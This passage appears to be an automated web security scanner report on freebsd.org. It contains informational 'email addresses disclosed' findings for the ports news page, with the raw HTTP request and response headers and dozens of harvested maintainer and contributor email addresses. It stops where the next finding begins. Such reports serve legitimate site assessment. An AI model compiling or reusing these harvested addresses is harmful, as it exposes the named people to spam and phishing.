<A HREF="mailto:m.seaman@infracaninophile.co.uk">m.seaman@infracaninophile.co.uk</A>
...[SNIP]...
<A HREF="mailto:roam@FreeBSD.org">roam@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oleg@mamontov.net">oleg@mamontov.net</A>
...[SNIP]...
<A HREF="mailto:snabb@epipe.com">snabb@epipe.com</A>
...[SNIP]...
<A HREF="mailto:citycat4@ngs.ru">citycat4@ngs.ru</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:zakj@nox.cx">zakj@nox.cx</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lukasz@wasikowski.net">lukasz@wasikowski.net</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lippe@FreeBSD.org">lippe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mi@aldan.algebra.com">mi@aldan.algebra.com</A>
...[SNIP]...
<A HREF="mailto:alexey@renatasystems.org">alexey@renatasystems.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:bart@tapolsky.net.ua">bart@tapolsky.net.ua</A>
...[SNIP]...
<A HREF="mailto:fw@moov.de">fw@moov.de</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mich@FreeBSD.org">mich@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:hubert@frbsd.org">hubert@frbsd.org</A>
...[SNIP]...
<A HREF="mailto:glarkin@FreeBSD.org">glarkin@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:eksffa@freebsdbrasil.com.br">eksffa@freebsdbrasil.com.br</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lasse@freebsdcluster.org">lasse@freebsdcluster.org</A>
...[SNIP]...
<A HREF="mailto:michael@ranner.eu">michael@ranner.eu</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:michael@ranner.eu">michael@ranner.eu</A>
...[SNIP]...
<A HREF="mailto:michael@ranner.eu">michael@ranner.eu</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ohauer@FreeBSD.org">ohauer@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:xride@FreeBSD.org">xride@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stefan@FreeBSD.org">stefan@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:leeym@FreeBSD.org">leeym@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fw@moov.de">fw@moov.de</A>
...[SNIP]...
<A HREF="mailto:ast@treibsand.com">ast@treibsand.com</A>
...[SNIP]...
<A HREF="mailto:ast@treibsand.com">ast@treibsand.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:chifeng@gmail.com">chifeng@gmail.com</A>
...[SNIP]...
<A HREF="mailto:tabthorpe@freebsd.org">tabthorpe@freebsd.org</A>
...[SNIP]...
<A HREF="mailto:lambert@lambertfam.org">lambert@lambertfam.org</A>
...[SNIP]...
<A HREF="mailto:tabthorpe@FreeBSD.org">tabthorpe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:neil@darlow.co.uk">neil@darlow.co.uk</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tabthorpe@FreeBSD.org">tabthorpe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tabthorpe@FreeBSD.org">tabthorpe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:stb@lassitu.de">stb@lassitu.de</A>
...[SNIP]...
<A HREF="mailto:tabthorpe@FreeBSD.org">tabthorpe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:neil@darlow.co.uk">neil@darlow.co.uk</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports.maintainer@evilphi.com">ports.maintainer@evilphi.com</A>
...[SNIP]...
<A HREF="mailto:tabthorpe@FreeBSD.org">tabthorpe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tabthorpe@FreeBSD.org">tabthorpe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:morinaga@riken.jp">morinaga@riken.jp</A>
...[SNIP]...
<A HREF="mailto:tabthorpe@FreeBSD.org">tabthorpe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:email-ports@def-defying.com">email-ports@def-defying.com</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:itetcu@FreeBSD.org">itetcu@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:neil@darlow.co.uk">neil@darlow.co.uk</A>
...[SNIP]...
<A HREF="mailto:tabthorpe@FreeBSD.org">tabthorpe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:aragon@phat.za.net">aragon@phat.za.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:beat@FreeBSD.org">beat@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:utisoft@gmail.com">utisoft@gmail.com</A>
...[SNIP]...
<A HREF="mailto:utisoft@gmail.com">utisoft@gmail.com</A>
...[SNIP]...
<A HREF="mailto:nork@FreeBSD.org">nork@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sergei@FreeBSD.org">sergei@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gecko@FreeBSD.org">gecko@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gecko@FreeBSD.org">gecko@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mjl@luckie.org.nz">mjl@luckie.org.nz</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gecko@FreeBSD.org">gecko@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gecko@FreeBSD.org">gecko@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sjroz@verizon.net">sjroz@verizon.net</A>
...[SNIP]...
<A HREF="mailto:anders@FreeBSD.org">anders@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sergei@FreeBSD.org">sergei@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:boris@tagnet.ru">boris@tagnet.ru</A>
...[SNIP]...
<A HREF="mailto:mnag@FreeBSD.org">mnag@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sylvio@FreeBSD.org">sylvio@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mbr@FreeBSD.org">mbr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tmseck@netcologne.de">tmseck@netcologne.de</A>
...[SNIP]...
<A HREF="mailto:mcdouga9@egr.msu.edu">mcdouga9@egr.msu.edu</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:loos.br@gmail.com">loos.br@gmail.com</A>
...[SNIP]...
<A HREF="mailto:sem@FreeBSD.org">sem@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jhein@symmetricom.com">jhein@symmetricom.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mij@bitchx.it">mij@bitchx.it</A>
...[SNIP]...
<A HREF="mailto:james@now.ie">james@now.ie</A>
...[SNIP]...
<A HREF="mailto:roam@FreeBSD.org">roam@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ale@FreeBSD.org">ale@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:oliver@FreeBSD.org">oliver@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:jadawin@FreeBSD.org">jadawin@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nobutaka@FreeBSD.org">nobutaka@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sem@FreeBSD.org">sem@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:garga@FreeBSD.org">garga@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:otaviof@gmail.com">otaviof@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ume@FreeBSD.org">ume@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ume@FreeBSD.org">ume@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lippe@FreeBSD.org">lippe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:faber@isi.edu">faber@isi.edu</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:sjroz@verizon.net">sjroz@verizon.net</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:x11@FreeBSD.org">x11@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gecko@FreeBSD.org">gecko@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:delphus@gmail.com">delphus@gmail.com</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:rafan@FreeBSD.org">rafan@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:avatar@mmlab.cse.yzu.edu.tw">avatar@mmlab.cse.yzu.edu.tw</A>
...[SNIP]...
<A HREF="mailto:gahr@FreeBSD.org">gahr@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vvelox@vvelox.net">vvelox@vvelox.net</A>
...[SNIP]...

24.315. http://www.freebsd.org/ports/news.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/ports/news.html

Issue detail

The following email addresses were disclosed in the response:

ache@FreeBSD.org
avatar@mmlab.cse.yzu.edu.tw
clsung@FreeBSD.org
daniel@netwalk.org
dinoex@FreeBSD.org
dk@farm.org
dougb@FreeBSD.org
dsh@vlink.ru
edwin@mavetju.org
ehaupt@FreeBSD.org
fehlner@gmx.de
fjoe@FreeBSD.org
fluffy@FreeBSD.org
gnome@FreeBSD.org
gslin@gslin.org
johans@FreeBSD.org
john@zoner.org
kde@FreeBSD.org
koma2@lovepeers.org
lasse@freebsdcluster.org
leeym@FreeBSD.org
lioux@FreeBSD.org
mail@ozzmosis.com
mandree@FreeBSD.org
mich@FreeBSD.org
miki@ceti.pl
miwi@FreeBSD.org
neal@nelson.name
netchild@FreeBSD.org
nivit@FreeBSD.org
obrien@FreeBSD.org
os@rsu.ru
pav@FreeBSD.org
perl@FreeBSD.org
pjenvey@groovie.org
ports@FreeBSD.org
ports@thepentagon.org
skv@FreeBSD.org
tdb@FreeBSD.org
thierry@FreeBSD.org
toxic@doobie.com
vd@FreeBSD.org
vk@vk.pp.ru

Request

GET /ports/news.html HTTP/1.1
Host: www.freebsd.org
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
ETag: "1467617764"
Last-Modified: Sun, 23 Jan 2011 02:29:32 GMT
Content-Length: 176619
Date: Mon, 24 Jan 2011 14:54:35 GMT
Server: httpd/1.4.x LaHonda

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>FreeBSD Ports: News</TITLE>
<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/ht
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ache@FreeBSD.org">ache@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dougb@FreeBSD.org">dougb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:obrien@FreeBSD.org">obrien@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ehaupt@FreeBSD.org">ehaupt@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:netchild@FreeBSD.org">netchild@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vk@vk.pp.ru">vk@vk.pp.ru</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dsh@vlink.ru">dsh@vlink.ru</A>
...[SNIP]...
<A HREF="mailto:pjenvey@groovie.org">pjenvey@groovie.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:os@rsu.ru">os@rsu.ru</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:os@rsu.ru">os@rsu.ru</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:os@rsu.ru">os@rsu.ru</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mail@ozzmosis.com">mail@ozzmosis.com</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:os@rsu.ru">os@rsu.ru</A>
...[SNIP]...
<A HREF="mailto:fjoe@FreeBSD.org">fjoe@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fluffy@FreeBSD.org">fluffy@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:koma2@lovepeers.org">koma2@lovepeers.org</A>
...[SNIP]...
<A HREF="mailto:kde@FreeBSD.org">kde@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mandree@FreeBSD.org">mandree@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:vd@FreeBSD.org">vd@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:pav@FreeBSD.org">pav@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:mich@FreeBSD.org">mich@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:thierry@FreeBSD.org">thierry@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lasse@freebsdcluster.org">lasse@freebsdcluster.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dk@farm.org">dk@farm.org</A>
...[SNIP]...
<A HREF="mailto:leeym@FreeBSD.org">leeym@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:toxic@doobie.com">toxic@doobie.com</A>
...[SNIP]...
<A HREF="mailto:ports@thepentagon.org">ports@thepentagon.org</A>
...[SNIP]...
<A HREF="mailto:edwin@mavetju.org">edwin@mavetju.org</A>
...[SNIP]...
<A HREF="mailto:skv@FreeBSD.org">skv@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gslin@gslin.org">gslin@gslin.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:leeym@FreeBSD.org">leeym@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:perl@FreeBSD.org">perl@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:clsung@FreeBSD.org">clsung@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:gnome@FreeBSD.org">gnome@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miwi@FreeBSD.org">miwi@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:lioux@FreeBSD.org">lioux@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:neal@nelson.name">neal@nelson.name</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:tdb@FreeBSD.org">tdb@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:daniel@netwalk.org">daniel@netwalk.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:fehlner@gmx.de">fehlner@gmx.de</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:dinoex@FreeBSD.org">dinoex@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:john@zoner.org">john@zoner.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:nivit@FreeBSD.org">nivit@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:johans@FreeBSD.org">johans@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:ports@FreeBSD.org">ports@FreeBSD.org</A>
...[SNIP]...
<A HREF="mailto:miki@ceti.pl">miki@ceti.pl</A>
...[SNIP]...
<A HREF="mailto:avatar@mmlab.cse.yzu.edu.tw">avatar@mmlab.cse.yzu.edu.tw</A>
...[SNIP]...
<A HREF="mailto:leeym@FreeBSD.org">leeym@FreeBSD.org</A>
...[SNIP]...

24.316. http://www.freebsd.org/ports/news.html/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/ports/news.html/x22

Issue detail

